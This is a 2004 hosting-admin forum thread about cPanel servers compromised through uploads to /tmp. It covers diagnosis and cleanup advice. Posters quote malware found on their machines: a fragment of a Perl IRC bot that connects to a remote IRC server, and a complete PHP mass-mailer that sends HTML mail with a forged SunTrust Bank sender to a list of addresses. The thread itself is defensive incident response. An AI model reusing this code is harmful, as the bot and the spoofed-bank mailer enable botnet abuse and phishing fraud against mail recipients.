The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Nobody user?

Discussion in 'General Discussion' started by Daemon1, Dec 5, 2004.

  1. Daemon1

    Daemon1 Well-Known Member

    Joined:
    Nov 26, 2003
    Messages:
    87
    Likes Received:
    0
    Trophy Points:
    6
    Hi,

    I was wondering if someone could give me some information about a process I have running that's chewing 69% of the cpu by a nobody user. Is this normal to see? Or should I get it checked out? If anyone can provide some details about this and what I can do to check what exactly is causing this it would be appreciated thanks.
     
  2. dezignguy

    dezignguy Well-Known Member

    Joined:
    Sep 26, 2004
    Messages:
    534
    Likes Received:
    0
    Trophy Points:
    16
    Yes, you do need to check this out... can't say much else about it because you didn't give any further info. Show the output from 'ps aux' and 'top'.

    It could be one of your customers just running a script that's pretty popular, or poorly written.... or it could be a DOS, spam, or hack program that was uploaded and run through insecure scripts.
     
  3. Daemon1

    Daemon1 Well-Known Member

    Joined:
    Nov 26, 2003
    Messages:
    87
    Likes Received:
    0
    Trophy Points:
    6
    This is the output of ps aux:

    nobody 6948 0.0 0.0 0 0 ? Z Dec05 0:00 [sh <defunct>]
    nobody 6955 0.0 0.0 1876 4 ? T Dec05 0:00 cround
    nobody 6956 0.0 0.0 0 0 ? Z Dec05 0:00 [cround <defunct>
    nobody 6957 0.0 0.0 2144 496 ? S Dec05 0:00 cround
    nobody 30577 0.3 0.8 18288 8576 ? S 00:52 1:00 /usr/local/apache
    nobody 30885 0.0 0.0 0 0 ? Z 01:02 0:00 [sh <defunct>]
    nobody 30891 91.7 0.2 7252 2524 ? R 01:02 300:30 -bash
    nobody 8513 0.2 0.4 15316 4988 ? S 06:09 0:03 /usr/local/apache
    nobody 8845 0.0 0.3 15028 3916 ? S 06:21 0:00 /usr/local/apache
    nobody 9024 0.4 0.5 15312 5280 ? S 06:25 0:01 /usr/local/apache
    nobody 9032 0.3 0.4 15332 5068 ? S 06:25 0:00 /usr/local/apache
    nobody 9074 0.3 0.4 15232 5044 ? S 06:26 0:00 /usr/local/apache
    nobody 9123 0.0 0.3 13836 3476 ? S 06:28 0:00 /usr/local/apache

    And the results of top:

    30891 nobody 25 0 2524 2524 956 R 91.0 0.2 300:16 0 perl

    Thats the process chewing which I have since killed... (actually attempts at killing this process do nothing) What are the above processes doing in the output of ps aux?
     
    #3 Daemon1, Dec 6, 2004
    Last edited: Dec 6, 2004
  4. mher

    mher Well-Known Member

    Joined:
    Jun 14, 2004
    Messages:
    49
    Likes Received:
    0
    Trophy Points:
    6
    This same thing is happening with me. a process called perl and owned by nobody is causing high load on the server and you can't kill the process.

    The first thing to do is check your /tmp directory for suspicious perl scripts. If you find one delete it and then restart httpd. that will take the load back to normal.

    I already secured my tmp dir by running /scripts/securetmp but that doesn't prevent your users from uploading scripts and running them.

    This seems a major cpanel security bug.
     
  5. Daemon1

    Daemon1 Well-Known Member

    Joined:
    Nov 26, 2003
    Messages:
    87
    Likes Received:
    0
    Trophy Points:
    6
    Ive secured tmp as per instruction of cpanel guys, and it actually made it 4x as bad lol I didnt check it for anything prior however... Should this still occur after it has been secured? Or tmp dir content removed first, then secured? What should I do now considering the tmp dir has already been secured but the problem still exists, and is infact worse?

    I forgot to ask, what defines a suspicious cgi tmp file? I see a couple, I removed them all and now there is nothing but sess_ files in the /tmp, I restarted httpd but the process still exists!
     
    #5 Daemon1, Dec 6, 2004
    Last edited: Dec 6, 2004
  6. Daemon1

    Daemon1 Well-Known Member

    Joined:
    Nov 26, 2003
    Messages:
    87
    Likes Received:
    0
    Trophy Points:
    6
    I found the script in ./tmp :

    my $processo = '-bash';
    #----------------------------------------------##
    my $linas_max='10'; #
    #----------------------------------------------#
    my $sleep='3'; #
    #

    And all this other stuff, this is consistant with the command chewing the cpu... I have removed this file from the tmp dir, restarted httpd and it still is running! Gah! Anyone?
     
  7. mher

    mher Well-Known Member

    Joined:
    Jun 14, 2004
    Messages:
    49
    Likes Received:
    0
    Trophy Points:
    6
    $processo

    that sounds like the brazillian hackers.

    basically you can remove all files in tmp except for the mysql.sock
     
  8. Daemon1

    Daemon1 Well-Known Member

    Joined:
    Nov 26, 2003
    Messages:
    87
    Likes Received:
    0
    Trophy Points:
    6
    Wiped out everything but mysql.sock, restarted httpd and process still exists...

    Manually killed with "kill -9 xxxx" and that got rid of it once deleting it from tmp, cpu state seems ok in ssh via "top" however WHM is still reporting extreme cpu usage, and still listing the -bash processes running hogging it all!
     
    #8 Daemon1, Dec 6, 2004
    Last edited: Dec 6, 2004
  9. dezignguy

    dezignguy Well-Known Member

    Joined:
    Sep 26, 2004
    Messages:
    534
    Likes Received:
    0
    Trophy Points:
    16
    You're likely going to need an OS reload... unless you're positive that they weren't able to run a local exploit to get root... as they at least tried some local kernel overflows.
     
  10. Daemon1

    Daemon1 Well-Known Member

    Joined:
    Nov 26, 2003
    Messages:
    87
    Likes Received:
    0
    Trophy Points:
    6
    The script appeared to have something to do with IRC...


    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
    if (defined($IRC_socket)) {
    $IRC_cur_socket = $IRC_socket;

    $IRC_socket->autoflush(1);
    $sel_cliente->add($IRC_socket);

    $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
    $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
    $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
    nick("$meunick");
    sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
    sleep 1;


    There is a bunch of DCC/Socket bs also in the script located. I have since been able to get cpu usage back to normal since removing this script and I havent noticed anything else out of the ordinary thus far. Anything to check for in this instance to make sure nothing further did occur?
     
  11. mher

    mher Well-Known Member

    Joined:
    Jun 14, 2004
    Messages:
    49
    Likes Received:
    0
    Trophy Points:
    6
    one of your users uploaded this script and run it. they can do that again until you find out who they are and terminate them.

    OS reload won't help at all if you are still going to use cpanel and host that user whoever is he.

    one way to know who the user was is to do ls -lh in tmp directory and find out when the file was created. then look at the logs of your users for any matches
     
    #11 mher, Dec 7, 2004
    Last edited: Dec 7, 2004
  12. Daemon1

    Daemon1 Well-Known Member

    Joined:
    Nov 26, 2003
    Messages:
    87
    Likes Received:
    0
    Trophy Points:
    6
    Would the fact that the /tmp directory wasnt secured before via /scripts/securetmp until yesterday suggest it could of been a public user? I have a very small client base, so it would be more likely that it was someone public if possible. The file has been removed, I only have a copy locally unfortunately so ls -lh does not provide any information about which user put it there if so...
     
  13. sleuth1

    sleuth1 Well-Known Member

    Joined:
    Mar 16, 2003
    Messages:
    75
    Likes Received:
    0
    Trophy Points:
    6
    /scripts/securetmp wont stop .pl scripts in tmp , and your up to date moron hacker is well aware of this , they upload the scripts via insecure php programs often phpnuke , and various unpatched forums .

    you can get a linux security person to check your box and harden a lot of things off

    my own daily security audit ( at least twice a day ) because they will be back

    login via WHM ( first for speed ) > current cpu > look for any suspicous programs

    anything nobody ( should not be there )
    anything ./script
    anything weird e.g http1 , inetds, etc


    need to kill nobody quickly ?

    click on the nobody pid ( far left ) > kill all processes owned by nobody

    ( or before killing nobody) find something ?

    do > list current running process.s > this should show you exactly where the script is look for /tmp , dev/shm , var/spool/mail ( ssh to the directory and remove )

    ssh > cd /tmp
    ls -al
    look for weird files >only sessions, cpanel tmp , mysql sock, spamassasin and few others
    look for
    ./ ok
    ../ok
    .../ this one is a hack

    Then check your bandwidth usage

    http://yourservername.com/bandwidth/

    This is updated very quickly so you should know exactly how much DDOS ing some poor devil has received from your machine ( which seems to be the sole purpose of moron hackers )
     
  14. Amorya

    Amorya Member

    Joined:
    Apr 28, 2004
    Messages:
    14
    Likes Received:
    0
    Trophy Points:
    1
    Found this (as sun.php) in my /tmp directory:

    Code:
    <?php
    include("ini.inc");
    $mail_header  = "From: Suntrust Bank<accounts@suntrust.com>\n";
    $mail_header .= "Content-Type: text/html\n";
    $subject="Customer Notification";
    $body=loadini("test.txt");
    if (!($fp = fopen("list.txt", "r")))
            exit("Unable to open $listFile.");
    $i=0;
    print "Pocetno Vreme "; print date("Y:m:d H:i"); print "\n";
    while (!feof($fp)) {
            fscanf($fp, "%s", $name);
            $i++;
            mail($name, $subject, $body, $mail_header);
    }
    print "Krajno Vreme E "; print date("Y:m:d H:i"); print "\n";
    print "$i"; print "E-mailite Se Prateni."; print"\n";
    ?>
    
    Have renamed it and will delete shortly. My server still seems to be pouring out huge volumes of mail though...


    Amorya
     
Loading...

Share This Page